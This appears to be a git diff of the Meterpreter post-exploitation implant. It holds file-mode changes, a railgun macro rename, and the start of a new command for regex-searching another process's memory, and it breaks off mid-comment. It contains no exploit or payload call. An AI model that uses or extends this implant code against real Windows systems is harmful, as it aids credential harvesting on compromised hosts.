diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index fac3adab1..81cde88be 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection @@ -1 +1 @@ -Subproject commit fac3adab1187deade60eef27be8423ee117c1e1f +Subproject commit 81cde88bebaa9fe782391712518903b5923470fb diff --git a/c/meterpreter/source/common/common_command_ids.h b/c/meterpreter/source/common/common_command_ids.h old mode 100755 new mode 100644 index f7ee80d66..e9951eecd --- a/c/meterpreter/source/common/common_command_ids.h +++ b/c/meterpreter/source/common/common_command_ids.h @@ -174,6 +174,7 @@ #define COMMAND_ID_STDAPI_AUDIO_MIC_START 1115 #define COMMAND_ID_STDAPI_AUDIO_MIC_STOP 1116 #define COMMAND_ID_STDAPI_AUDIO_MIC_LIST 1117 +#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH 1119 #define COMMAND_ID_PRIV_ELEVATE_GETSYSTEM 2001 #define COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE 2002 #define COMMAND_ID_PRIV_FS_BLANK_FILE_MACE 2003 diff --git a/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c b/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h b/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/dump_sam/dump_sam.def b/c/meterpreter/source/dump_sam/dump_sam.def old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/extapi/ntds.c b/c/meterpreter/source/extensions/extapi/ntds.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/headers.h b/c/meterpreter/source/extensions/peinjector/headers.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpefile.c b/c/meterpreter/source/extensions/peinjector/libpefile.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpefile.h b/c/meterpreter/source/extensions/peinjector/libpefile.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect.c b/c/meterpreter/source/extensions/peinjector/libpeinfect.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect.h b/c/meterpreter/source/extensions/peinjector/libpeinfect.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.c b/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.h b/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpetool.c b/c/meterpreter/source/extensions/peinjector/libpetool.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpetool.h b/c/meterpreter/source/extensions/peinjector/libpetool.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/peinjector.c b/c/meterpreter/source/extensions/peinjector/peinjector.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/peinjector.h b/c/meterpreter/source/extensions/peinjector/peinjector.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/peinjector_bridge.c b/c/meterpreter/source/extensions/peinjector/peinjector_bridge.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/peinjector_bridge.h b/c/meterpreter/source/extensions/peinjector/peinjector_bridge.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell.c b/c/meterpreter/source/extensions/powershell/powershell.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell.h b/c/meterpreter/source/extensions/powershell/powershell.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bindings.cpp b/c/meterpreter/source/extensions/powershell/powershell_bindings.cpp old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bindings.h b/c/meterpreter/source/extensions/powershell/powershell_bindings.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bridge.cpp b/c/meterpreter/source/extensions/powershell/powershell_bridge.cpp old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bridge.h b/c/meterpreter/source/extensions/powershell/powershell_bridge.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/elevate.c b/c/meterpreter/source/extensions/priv/elevate.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/elevate.h b/c/meterpreter/source/extensions/priv/elevate.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/namedpipe_efs.c b/c/meterpreter/source/extensions/priv/namedpipe_efs.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/priv.rc b/c/meterpreter/source/extensions/priv/priv.rc old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/resource.h b/c/meterpreter/source/extensions/priv/resource.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/python/python_commands.c b/c/meterpreter/source/extensions/python/python_commands.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/python/python_commands.h b/c/meterpreter/source/extensions/python/python_commands.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/python/python_main.c b/c/meterpreter/source/extensions/python/python_main.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/python/python_meterpreter_binding.c b/c/meterpreter/source/extensions/python/python_meterpreter_binding.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c old mode 100755 new mode 100644 index 879c9c7c6..67c18f186 --- a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c +++ b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c @@ -220,32 +220,32 @@ DWORD railgun_call( RAILGUN_INPUT * pInput, RAILGUN_OUTPUT * pOutput ) #ifdef _WIN64 switch( dwStackSizeInElements ) { - case 0: pOutput->qwReturnValue = function( 00 )(); break; - case 1: pOutput->qwReturnValue = function( 01 )( p(0) ); break; - case 2: pOutput->qwReturnValue = function( 02 )( p(0), p(1) ); break; - case 3: pOutput->qwReturnValue = function( 03 )( p(0), p(1), p(2) ); break; - case 4: pOutput->qwReturnValue = function( 04 )( p(0), p(1), p(2), p(3) );break; - case 5: pOutput->qwReturnValue = function( 05 )( p(0), p(1), p(2), p(3), p(4) );break; - case 6: pOutput->qwReturnValue = function( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; - case 7: pOutput->qwReturnValue = function( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; - case 8: pOutput->qwReturnValue = function( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; - case 9: pOutput->qwReturnValue = function( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; - case 10: pOutput->qwReturnValue = function( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; - case 11: pOutput->qwReturnValue = function( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; - case 12: pOutput->qwReturnValue = function( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; - case 13: pOutput->qwReturnValue = function( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; - case 14: pOutput->qwReturnValue = function( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; - case 15: pOutput->qwReturnValue = function( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; - case 16: pOutput->qwReturnValue = function( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; - case 17: pOutput->qwReturnValue = function( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; - case 18: pOutput->qwReturnValue = function( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; - case 19: pOutput->qwReturnValue = function( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; - case 20: pOutput->qwReturnValue = function( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; - case 21: pOutput->qwReturnValue = function( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; - case 22: pOutput->qwReturnValue = function( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; - case 23: pOutput->qwReturnValue = function( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; - case 24: pOutput->qwReturnValue = function( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; - case 25: pOutput->qwReturnValue = function( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; + case 0: pOutput->qwReturnValue = stdcall_func( 00 )(); break; + case 1: pOutput->qwReturnValue = stdcall_func( 01 )( p(0) ); break; + case 2: pOutput->qwReturnValue = stdcall_func( 02 )( p(0), p(1) ); break; + case 3: pOutput->qwReturnValue = stdcall_func( 03 )( p(0), p(1), p(2) ); break; + case 4: pOutput->qwReturnValue = stdcall_func( 04 )( p(0), p(1), p(2), p(3) );break; + case 5: pOutput->qwReturnValue = stdcall_func( 05 )( p(0), p(1), p(2), p(3), p(4) );break; + case 6: pOutput->qwReturnValue = stdcall_func( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; + case 7: pOutput->qwReturnValue = stdcall_func( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; + case 8: pOutput->qwReturnValue = stdcall_func( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; + case 9: pOutput->qwReturnValue = stdcall_func( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; + case 10: pOutput->qwReturnValue = stdcall_func( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; + case 11: pOutput->qwReturnValue = stdcall_func( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; + case 12: pOutput->qwReturnValue = stdcall_func( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; + case 13: pOutput->qwReturnValue = stdcall_func( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; + case 14: pOutput->qwReturnValue = stdcall_func( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; + case 15: pOutput->qwReturnValue = stdcall_func( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; + case 16: pOutput->qwReturnValue = stdcall_func( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; + case 17: pOutput->qwReturnValue = stdcall_func( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; + case 18: pOutput->qwReturnValue = stdcall_func( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; + case 19: pOutput->qwReturnValue = stdcall_func( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; + case 20: pOutput->qwReturnValue = stdcall_func( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; + case 21: pOutput->qwReturnValue = stdcall_func( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; + case 22: pOutput->qwReturnValue = stdcall_func( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; + case 23: pOutput->qwReturnValue = stdcall_func( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; + case 24: pOutput->qwReturnValue = stdcall_func( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; + case 25: pOutput->qwReturnValue = stdcall_func( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; default: dprintf( "[RAILGUN] railgun_call: Can't call function: dwStackSizeInElements (%d) is > 25", dwStackSizeInElements ); @@ -295,32 +295,32 @@ DWORD railgun_call( RAILGUN_INPUT * pInput, RAILGUN_OUTPUT * pOutput ) } else { // STDCALL switch( dwStackSizeInElements ) { - case 0: pOutput->qwReturnValue = function( 00 )(); break; - case 1: pOutput->qwReturnValue = function( 01 )( p(0) ); break; - case 2: pOutput->qwReturnValue = function( 02 )( p(0), p(1) ); break; - case 3: pOutput->qwReturnValue = function( 03 )( p(0), p(1), p(2) ); break; - case 4: pOutput->qwReturnValue = function( 04 )( p(0), p(1), p(2), p(3) );break; - case 5: pOutput->qwReturnValue = function( 05 )( p(0), p(1), p(2), p(3), p(4) );break; - case 6: pOutput->qwReturnValue = function( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; - case 7: pOutput->qwReturnValue = function( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; - case 8: pOutput->qwReturnValue = function( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; - case 9: pOutput->qwReturnValue = function( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; - case 10: pOutput->qwReturnValue = function( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; - case 11: pOutput->qwReturnValue = function( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; - case 12: pOutput->qwReturnValue = function( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; - case 13: pOutput->qwReturnValue = function( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; - case 14: pOutput->qwReturnValue = function( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; - case 15: pOutput->qwReturnValue = function( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; - case 16: pOutput->qwReturnValue = function( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; - case 17: pOutput->qwReturnValue = function( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; - case 18: pOutput->qwReturnValue = function( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; - case 19: pOutput->qwReturnValue = function( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; - case 20: pOutput->qwReturnValue = function( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; - case 21: pOutput->qwReturnValue = function( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; - case 22: pOutput->qwReturnValue = function( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; - case 23: pOutput->qwReturnValue = function( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; - case 24: pOutput->qwReturnValue = function( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; - case 25: pOutput->qwReturnValue = function( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; + case 0: pOutput->qwReturnValue = stdcall_func( 00 )(); break; + case 1: pOutput->qwReturnValue = stdcall_func( 01 )( p(0) ); break; + case 2: pOutput->qwReturnValue = stdcall_func( 02 )( p(0), p(1) ); break; + case 3: pOutput->qwReturnValue = stdcall_func( 03 )( p(0), p(1), p(2) ); break; + case 4: pOutput->qwReturnValue = stdcall_func( 04 )( p(0), p(1), p(2), p(3) );break; + case 5: pOutput->qwReturnValue = stdcall_func( 05 )( p(0), p(1), p(2), p(3), p(4) );break; + case 6: pOutput->qwReturnValue = stdcall_func( 06 )( p(0), p(1), p(2), p(3), p(4), p(5) );break; + case 7: pOutput->qwReturnValue = stdcall_func( 07 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6) );break; + case 8: pOutput->qwReturnValue = stdcall_func( 08 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7) );break; + case 9: pOutput->qwReturnValue = stdcall_func( 09 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8) );break; + case 10: pOutput->qwReturnValue = stdcall_func( 10 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9) );break; + case 11: pOutput->qwReturnValue = stdcall_func( 11 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10) );break; + case 12: pOutput->qwReturnValue = stdcall_func( 12 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11) );break; + case 13: pOutput->qwReturnValue = stdcall_func( 13 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12) );break; + case 14: pOutput->qwReturnValue = stdcall_func( 14 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13) );break; + case 15: pOutput->qwReturnValue = stdcall_func( 15 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14) );break; + case 16: pOutput->qwReturnValue = stdcall_func( 16 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15) );break; + case 17: pOutput->qwReturnValue = stdcall_func( 17 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16) );break; + case 18: pOutput->qwReturnValue = stdcall_func( 18 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17) );break; + case 19: pOutput->qwReturnValue = stdcall_func( 19 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18) );break; + case 20: pOutput->qwReturnValue = stdcall_func( 20 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19) );break; + case 21: pOutput->qwReturnValue = stdcall_func( 21 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20) );break; + case 22: pOutput->qwReturnValue = stdcall_func( 22 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21) );break; + case 23: pOutput->qwReturnValue = stdcall_func( 23 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22) );break; + case 24: pOutput->qwReturnValue = stdcall_func( 24 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23) );break; + case 25: pOutput->qwReturnValue = stdcall_func( 25 )( p(0), p(1), p(2), p(3), p(4), p(5), p(6), p(7), p(8), p(9), p(10), p(11), p(12), p(13), p(14), p(15), p(16), p(17), p(18), p(19), p(20), p(21), p(22), p(23), p(24) );break; default: dprintf( "[RAILGUN] railgun_call: Can't call function: dwStackSizeInElements (%d) is > 25", dwStackSizeInElements ); diff --git a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h old mode 100644 new mode 100755 index 32a2d0427..6439e7019 --- a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h +++ b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.h @@ -47,7 +47,7 @@ typedef struct _RAILGUN_OUTPUT } RAILGUN_OUTPUT; #define p(i) (ULONG_PTR)pStack[i] -#define function(i) ((STDCALL_FUNC_##i)pFuncAddr) +#define stdcall_func(i) ((STDCALL_FUNC_##i)pFuncAddr) #define cdecl_func(i) ((CDECL_FUNC_##i)pFuncAddr) typedef ULONG_PTR (__stdcall * STDCALL_FUNC_00)( VOID ); diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c old mode 100644 new mode 100755 index cfa15fd8d..c9f54d2d0 --- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c +++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c @@ -69,6 +69,7 @@ Command customCommands[] = COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT, request_sys_process_memory_protect), COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK, request_sys_process_memory_lock), COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK, request_sys_process_memory_unlock), + COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH, request_sys_process_memory_search), // Thread COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN, request_sys_process_thread_open), diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index 597f5d964..ec404be30 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c @@ -1,5 +1,89 @@ #include "precomp.h" #include "common_metapi.h" +#include "../tiny-regex-c/re.h" + +#ifndef __kernel_entry +#define __kernel_entry +#endif + +typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE ProcessHandle, DWORD ProcessInformationClass, LPVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); + +typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); + +typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject); + +typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); + +typedef FARPROC(WINAPI* GETPROCADDRESS) (HMODULE hModule, LPCSTR lpProcName); + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtReadVirtualMemory.html +// https://ntdoc.m417z.com/ntreadvirtualmemory +typedef NTSTATUS(NTAPI* NTREADVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, LPVOID Buffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FMEMORY_INFORMATION_CLASS.html +typedef enum _MEMORY_INFORMATION_CLASS { + MemoryBasicInformation +} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS; + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING; +typedef UNICODE_STRING* PUNICODE_STRING; +typedef const UNICODE_STRING* PCUNICODE_STRING; + +// https://learn.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes +typedef struct _OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; + +typedef struct _RTL_USER_PROCESS_PARAMETERS { + BYTE Reserved1[16]; + PVOID Reserved2[10]; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; +} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; + +typedef +VOID +(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) ( + VOID + ); + +typedef struct _PEB { + BYTE Reserved1[2]; + BYTE BeingDebugged; + BYTE Reserved2[1]; + PVOID Reserved3[2]; + PPEB_LDR_DATA Ldr; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; + BYTE Reserved4[104]; + PVOID Reserved5[52]; + PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; + BYTE Reserved6[128]; + PVOID Reserved7[1]; + ULONG SessionId; +} PEB, * PPEB; + +typedef struct _PROCESS_BASIC_INFORMATION { + PVOID Reserved1; + PPEB PebBaseAddress; + PVOID Reserved2[2]; + ULONG_PTR UniqueProcessId; + PVOID Reserved3; +} PROCESS_BASIC_INFORMATION; +typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION; + +typedef enum _PROCESSINFOCLASS { + ProcessBasicInformation = 0, + ProcessWow64Information = 26 +} PROCESSINFOCLASS; /*! * @brief Allocates memory in the context of the supplied process. @@ -339,3 +423,223 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet) return ERROR_SUCCESS; } + +BOOL can_read_memory(DWORD memory_protect) +{ + const int page_execute_read = 0x20; + const int page_execute_readwrite = 0x40; + const int page_readonly = 0x02; + const int page_readwrite = 0x04; + + return memory_protect == page_execute_read || + memory_protect == page_execute_readwrite || + memory_protect == page_readonly || + memory_protect == page_readwrite; +} + +typedef struct { + re_t compiled_regex[MAX_REGEXP_OBJECTS]; + unsigned char buffer[MAX_CHAR_CLASS_LEN]; // Used for character strings when "[]" is used. +} RegexNeedle; + +#define NEEDLES_MAX (size_t)5 +#define MEMORY_BUFFER_SIZE (size_t)(64 * 1024 * 1024) + +/// <summary> +/// Add the needle results to a packet. This automatically inserts each result into a new group. Returns ERROR_SUCCESS on success, or 1 on failure. +/// 